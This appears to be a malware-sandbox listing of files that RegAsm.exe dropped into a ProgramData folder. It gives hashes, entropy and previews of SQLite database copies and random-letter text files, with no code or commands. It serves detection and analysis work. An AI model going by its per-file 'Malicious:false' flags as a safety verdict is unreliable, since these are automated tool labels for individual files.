                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\e3ekxb

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\f3ekn7

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\g4op8g

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\h4euai

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\imoh4w

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\jeua1n

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\kno8yc

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\lng4w4

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\q16f3w

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\r1djw4

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\u37g4w4ek

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\vs268q

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
